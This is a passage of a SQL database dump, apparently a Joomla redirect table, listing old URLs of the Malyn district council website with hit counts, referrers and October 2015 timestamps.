00:00:00',301),(15569,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/357-pro-hid-vikonannja-rajonnoi-programi_6','','','',2,0,'2015-10-31 14:02:47','0000-00-00 00:00:00',301),(15570,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/358-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_3?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:02:49','0000-00-00 00:00:00',301),(15571,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/361-pro-prisvoennja-golovi-rajonnoi-radi-chergovogo','','','',6,0,'2015-10-31 14:02:51','0000-00-00 00:00:00',301),(15572,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/106-pro-hid-vikonannja-rajonnoi-programi-realizacii_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:02:58','0000-00-00 00:00:00',301),(15573,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/107-pro-hid-vikonannja-kompleksnoi-programi-zerno','','','',5,0,'2015-10-31 14:03:01','0000-00-00 00:00:00',301),(15574,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/164-pro-hid-vikonannja-rajonnoi-programi-pidtrimki','','','',4,0,'2015-10-31 14:03:02','0000-00-00 00:00:00',301),(15575,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/165-pro-hid-vikonannja-rajonnoi-cilovoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:03:04','0000-00-00 00:00:00',301),(15576,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/54-pro-hid-vikonannja-rajonnoi-programi-socialnoi','','','',5,0,'2015-10-31 14:03:07','0000-00-00 00:00:00',301),(15577,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/55-pro-hid-vikonannja-rajonnoi-programi-rozvitku_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:03:10','0000-00-00 00:00:00',301),(15578,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/79-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_3','','','',4,0,'2015-10-31 14:03:12','0000-00-00 00:00:00',301),(15579,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/80-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:03:14','0000-00-00 00:00:00',301),(15580,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/806-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_5?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:03:16','0000-00-00 00:00:00',301),(15581,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/807-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_26?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:03:19','0000-00-00 00:00:00',301),(15582,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/421-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_10','','','',5,0,'2015-10-31 14:03:25','0000-00-00 00:00:00',301),(15583,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/428-pro-vstanovlennja-nadbavki-do-posadovogo-okladu_2','','','',5,0,'2015-10-31 14:03:28','0000-00-00 00:00:00',301),(15584,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/429-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_17?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:03:30','0000-00-00 00:00:00',301),(15585,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/436-pro-peredachu-materialnih-cinnostej-z-balansu?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:03:32','0000-00-00 00:00:00',301),(15586,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/334-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_3?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:03:35','0000-00-00 00:00:00',301),(15587,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/335-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_4?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:03:36','0000-00-00 00:00:00',301),(15588,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/336-pro-vnesennja-zmin-ta-dopovnen-do-rajonnoi','','','',5,0,'2015-10-31 14:03:39','0000-00-00 00:00:00',301),(15589,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/338-pro-prisvoennja-zvannja-pochesnogo-gromadjanina','','','',5,0,'2015-10-31 14:03:41','0000-00-00 00:00:00',301),(15590,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/339-pro-viznannja-takimi-shho-vtratili-chinnist-rishen','','','',5,0,'2015-10-31 14:03:43','0000-00-00 00:00:00',301),(15591,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/340-pro-zatverdzhennja-polozhennja-pro-porjadok_2','','','',2,0,'2015-10-31 14:03:45','0000-00-00 00:00:00',301),(15592,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/351-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_5?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:03:49','0000-00-00 00:00:00',301),(15593,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/352-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_6','','','',5,0,'2015-10-31 14:03:51','0000-00-00 00:00:00',301),(15594,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/354-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_13','','','',5,0,'2015-10-31 14:03:53','0000-00-00 00:00:00',301),(15595,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/355-pro-skasuvannja-rishennja-rajonnoi-radi-vid-27-04?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:03:57','0000-00-00 00:00:00',301),(15596,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/598-pro-pogodzhennja-priznachennja-na-posadu-direktora_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 14:03:59','0000-00-00 00:00:00',301),(15597,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/609-pro-prodovzhennja-dii-kontraktu-z-kerivnikom-kp_3?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:04:03','0000-00-00 00:00:00',301),(15598,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/611-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_21?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:04:05','0000-00-00 00:00:00',301),(15599,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/270-pro-zatverdzhennja-rajonnoi-kompleksnoi-programi_2','','','',5,0,'2015-10-31 14:04:10','0000-00-00 00:00:00',301),(15600,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/271-pro-pogodzhennja-rozmezhuvannja-zemel-derzhavnoi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:04:12','0000-00-00 00:00:00',301),(15601,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/278-pro-vnesennja-zmin-ta-dopovnen-do-polozhennja-pro_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:04:14','0000-00-00 00:00:00',301),(15602,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/280-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_11?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:04:16','0000-00-00 00:00:00',301),(15603,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/282-pro-stvorennja-chopovickogo-osvitnogo-okrugu','','','',5,0,'2015-10-31 14:04:18','0000-00-00 00:00:00',301),(15604,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/651-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_22?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 14:04:25','0000-00-00 00:00:00',301),(15605,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/356-pro-zatverdzhennja-programi-rozvitku-malogo-i?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:04:31','0000-00-00 00:00:00',301),(15606,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/412-pro-programu-socialno-ekonomichnogo-rozvitku_3','','','',2,0,'2015-10-31 14:04:33','0000-00-00 00:00:00',301),(15607,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/460-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_11','','','',7,0,'2015-10-31 14:04:36','0000-00-00 00:00:00',301),(15608,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/468-pro-zatverdzhennja-rajonnoi-cilovoi-programi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:04:38','0000-00-00 00:00:00',301),(15609,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/485-pro-zminu-nazvi-ta-zatverdzhennja-statutiv?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:04:44','0000-00-00 00:00:00',301),(15610,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/486-pro-zatverdzhennja-pereliku-ob’ektiv-spilnoi_4','','','',28,0,'2015-10-31 14:04:46','0000-00-00 00:00:00',301),(15611,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/487-pro-vikoristannja-koshtiv-shho-nadijshli-u_2','','','',5,0,'2015-10-31 14:04:47','0000-00-00 00:00:00',301),(15612,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/488-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_9?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:04:49','0000-00-00 00:00:00',301),(15613,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/10-pro-hid-vikonannja-rajonnoi-programi-shhodo?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:04:51','0000-00-00 00:00:00',301),(15614,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/11-pro-hid-vikonannja-rajonnoi-programi-realizacii','','','',2,0,'2015-10-31 14:04:54','0000-00-00 00:00:00',301),(15615,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/12-pro-hid-vikonannja-rajonnoi-programi-rozvitku?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:04:56','0000-00-00 00:00:00',301),(15616,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/124-pro-zvit-nachalnika-viddilu-derzhkomzemu-v','','','',2,0,'2015-10-31 14:04:58','0000-00-00 00:00:00',301),(15617,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/220-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-10-31 14:04:59','0000-00-00 00:00:00',301),(15618,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/231-pro-ne-zaperechennja-shhodo-nadannja-v?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:05:01','0000-00-00 00:00:00',301),(15619,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/254-pro-zatverdzhennja-polozhennja-pro-konkursnij','','','',4,0,'2015-10-31 14:05:03','0000-00-00 00:00:00',301),(15620,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/258-pro-zatverdzhennja-rozmiru-vartosti-produktiv_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 14:05:05','0000-00-00 00:00:00',301),(15621,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=uk','','','',11,0,'2015-10-31 14:26:21','0000-00-00 00:00:00',301),(15622,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku','','','',11,0,'2015-10-31 14:36:40','0000-00-00 00:00:00',301),(15623,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-','','','',9,0,'2015-10-31 14:39:51','0000-00-00 00:00:00',301),(15624,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16082013-','','','',10,0,'2015-10-31 14:46:10','0000-00-00 00:00:00',301),(15625,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=468:-15-2011-120-l-r&catid=38:--19122011-&Itemid=73&lang=ru','','','',7,0,'2015-10-31 15:05:28','0000-00-00 00:00:00',301),(15626,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--26122013-','','','',7,0,'2015-10-31 16:15:58','0000-00-00 00:00:00',301),(15627,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/69-rishennya-vid-26-11-2014-roku/925-pro-nadannya-dozvolu-na-vlashtuvannya-rudenko-k-v-do-chopovitskogo-statsionarnogo-viddilennya-postijnogo-prozhivannya-odinokikh-nepratsezdatnikh-gromad','','','',1,0,'2015-10-31 16:29:59','0000-00-00 00:00:00',301),(15628,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=329:2011-05-20-16-25-10&catid=33&Itemid=66&lang=uk','','','',3,0,'2015-10-31 18:42:17','0000-00-00 00:00:00',301),(15629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=488:2011-12-02-06-34-46&catid=38:--19122011-&Itemid=73&lang=ru','','','',4,0,'2015-10-31 18:42:18','0000-00-00 00:00:00',301),(15630,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1142-chopovitska-selishchna-rada-informue','','http://www.google.com.ua/url?url=http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1142-chopovitska-selishchna-rada-informue&rct=j&q=&esrc','',21,0,'2015-10-31 18:51:00','0000-00-00 00:00:00',301),(15631,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/224-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_5','','','',34,0,'2015-10-31 19:03:58','0000-00-00 00:00:00',301),(15632,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=737:2012-07-18-13-36-46&lang=uk&option=com_content&view=article','','','',2,0,'2015-10-31 19:13:14','0000-00-00 00:00:00',301),(15633,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/102-pro-polozhennja-pro-postijni-komisii-rajonnoi-radi','','','',16,0,'2015-10-31 19:14:29','0000-00-00 00:00:00',301),(15634,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/129-pro-rozpodil-vikoristannja-koshtiv-shho-nadhodjat','','','',6,0,'2015-10-31 19:14:31','0000-00-00 00:00:00',301),(15635,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-25032011/81-rishennja-prijnjati-na-4-sesii-malinskoi-rajonnoi','','','',7,0,'2015-10-31 19:14:33','0000-00-00 00:00:00',301),(15636,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/868-pro-peredachu-nerukhomogo-majna','','','',5,0,'2015-10-31 19:14:34','0000-00-00 00:00:00',301),(15638,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=317:-l-2008-2012-r&catid=33:-20052011&Itemid=66&lang=uk','','','',6,0,'2015-10-31 19:53:38','0000-00-00 00:00:00',301),(15639,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=834:-20-&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',4,0,'2015-10-31 20:02:42','0000-00-00 00:00:00',301),(15640,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/557-pro-zatverdzhennja-rozporjadzhennja-golovi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 20:24:15','0000-00-00 00:00:00',301),(15641,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/594-pro-zatverdzhennja-rozmiru-vartosti-produktiv_4?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 20:24:17','0000-00-00 00:00:00',301),(15642,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/605-pro-vikonannja-planu-roboti-rajonnoi-radi-za-2013?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 20:24:19','0000-00-00 00:00:00',301),(15643,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--16052012-/228-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_4?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-10-31 20:24:20','0000-00-00 00:00:00',301),(15644,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/95-pro-hid-vikonannja-rajonnoi-socialnoi-programi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 20:24:21','0000-00-00 00:00:00',301),(15645,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/96-pro-hid-vikonannja-rajonnoi-programi-vidznachennja?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-10-31 20:24:23','0000-00-00 00:00:00',301),(15646,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/485-pro-zminu-nazvi-ta-zatverdzhennja-statutiv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 20:24:33','0000-00-00 00:00:00',301),(15647,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=130:-2011-&catid=11&Itemid=16&lang=en','','','',5,0,'2015-10-31 20:35:00','0000-00-00 00:00:00',301),(15648,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=41:--27042012-&layout=blog&Itemid=78&lang=uk','','','',5,0,'2015-10-31 21:02:26','0000-00-00 00:00:00',301),(15649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=130:-------2011--&catid=11&Itemid=16&lang=uk','','','',2,0,'2015-10-31 21:31:00','0000-00-00 00:00:00',301),(15650,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=36&layout=blog&Itemid=70&lang=en&limitstart=10','','','',16,0,'2015-10-31 21:36:30','0000-00-00 00:00:00',301),(15651,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/375-pro-pogodzhennja-priznachennja-na-posadu-direktora','','','',14,0,'2015-10-31 22:05:33','0000-00-00 00:00:00',301),(15652,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/966-pro-zvernennya-do-prezidenta-ukrajini-golovi-verkhovnoji-radi-ukrajini-prem-er-ministra-ukrajini-shchodo-zberezhennya-4-ji-zoni-posilenogo-radiologichnogo-kon','','','',1,0,'2015-10-31 22:37:20','0000-00-00 00:00:00',301),(15653,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=58&Itemid=105&lang=ru','','','',41,0,'2015-10-31 22:44:41','0000-00-00 00:00:00',301),(15654,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=436:------l-r--2007-2011-&catid=37:--21102011-&Itemid=72&lang=ru','','','',2,0,'2015-10-31 22:46:14','0000-00-00 00:00:00',301),(15655,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-?limitstart=0','','','',15,0,'2015-10-31 22:47:57','0000-00-00 00:00:00',301),(15656,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/394-pro-deputatskij-zapit-deputata-rajonnoi-radi','','','',38,0,'2015-10-31 22:49:40','0000-00-00 00:00:00',301),(15657,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/675-pro-vnesennja-zmin-do-rajonnoi-programi_4?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 22:58:56','0000-00-00 00:00:00',301),(15658,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/676-pro-vnesennja-zmin-do-rajonnoi-kompleksnoi','','','',54,0,'2015-10-31 22:59:00','0000-00-00 00:00:00',301),(15659,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/679-pro-zatverdzhennja-porjadku-i-normativiv_4?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 22:59:04','0000-00-00 00:00:00',301),(15660,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/681-pro-programu-zabezpechennja-deputatskoi-dijalnosti_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 22:59:10','0000-00-00 00:00:00',301),(15661,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/693-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_15?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 22:59:14','0000-00-00 00:00:00',301),(15662,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/694-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_16?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 22:59:17','0000-00-00 00:00:00',301),(15663,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/698-pro-rozmishhennja-timchasovo-vilnih-koshtiv?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 22:59:21','0000-00-00 00:00:00',301),(15664,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/699-pro-zvernennja-deputativ-malinskoi-rajonnoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 22:59:24','0000-00-00 00:00:00',301),(15665,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/451-pro-vnesennja-dopovnennja-do-programi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 22:59:28','0000-00-00 00:00:00',301),(15666,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/362-pro-zminu-nazvi-nedashkivskoi-zosh-i-iii-stupeniv?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 22:59:41','0000-00-00 00:00:00',301),(15667,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/739-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_5?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:00:32','0000-00-00 00:00:00',301),(15668,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/742-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi_4?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:00:37','0000-00-00 00:00:00',301),(15669,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/114-pro-znjattja-z-kontrolju-rishen-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:00:41','0000-00-00 00:00:00',301),(15670,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/162-pro-nadannja-zgodi-na-prijnjattja-u-spilnu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:00:43','0000-00-00 00:00:00',301),(15671,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/165-pro-hid-vikonannja-rajonnoi-cilovoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:00:51','0000-00-00 00:00:00',301),(15672,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19072013-/544-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-10-31 23:01:01','0000-00-00 00:00:00',301),(15673,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/665-pro-nadannja-dozvolu-komunalnij-ustanovi-malinskij?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:03:38','0000-00-00 00:00:00',301),(15674,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/674-pro-zatverdzhennja-rajonnoi-programi-poshuku-i?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:03:39','0000-00-00 00:00:00',301),(15675,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/678-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_23?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:03:47','0000-00-00 00:00:00',301),(15676,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/682-pro-zatverdzhennja-rajonnoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-10-31 23:03:53','0000-00-00 00:00:00',301),(15677,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/695-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_17?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:03:59','0000-00-00 00:00:00',301),(15678,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/696-pro-zatverdzhennja-ugodi-pro-spilne-finansuvannja?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-10-31 23:04:00','0000-00-00 00:00:00',301),(15679,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/697-pro-vstanovlennja-nadbavki-do-posadovogo-okladu_3?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-10-31 23:04:02','0000-00-00 00:00:00',301),(15680,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/700-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi_3','','','',16,0,'2015-10-31 23:04:08','0000-00-00 00:00:00',301),(15681,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/702-pro-suspilno-politichnu-situaciju-v-ukraini','','','',20,0,'2015-10-31 23:04:10','0000-00-00 00:00:00',301),(15682,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/703-pro-rajonnij-bjudzhet-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:04:12','0000-00-00 00:00:00',301),(15683,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11032013-/453-pro-nadannja-zgodi-na-provedennja-kapitalnogo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:04:14','0000-00-00 00:00:00',301),(15684,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11032013-/476-pro-nadannja-dozvolu-na-vlashtuvannja-marchenko-v?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:04:16','0000-00-00 00:00:00',301),(15685,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/846-pro-zgodu-na-peredachu-mizhbjudzhetnogo-transfertu_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:04:17','0000-00-00 00:00:00',301),(15686,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/847-pro-vnesennja-zmin-do-rajonnoi-programi_5?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:04:19','0000-00-00 00:00:00',301),(15687,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--11072014-/850-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_4?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-10-31 23:04:20','0000-00-00 00:00:00',301),(15688,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/406-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_16','','','',25,0,'2015-10-31 23:04:22','0000-00-00 00:00:00',301),(15689,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/452-pro-spisannja-osnovnih-zasobiv_3','','','',14,0,'2015-10-31 23:04:25','0000-00-00 00:00:00',301),(15690,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/461-pro-vnesennja-dopovnennja-do-rajonnoi-kompleksnoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-10-31 23:04:27','0000-00-00 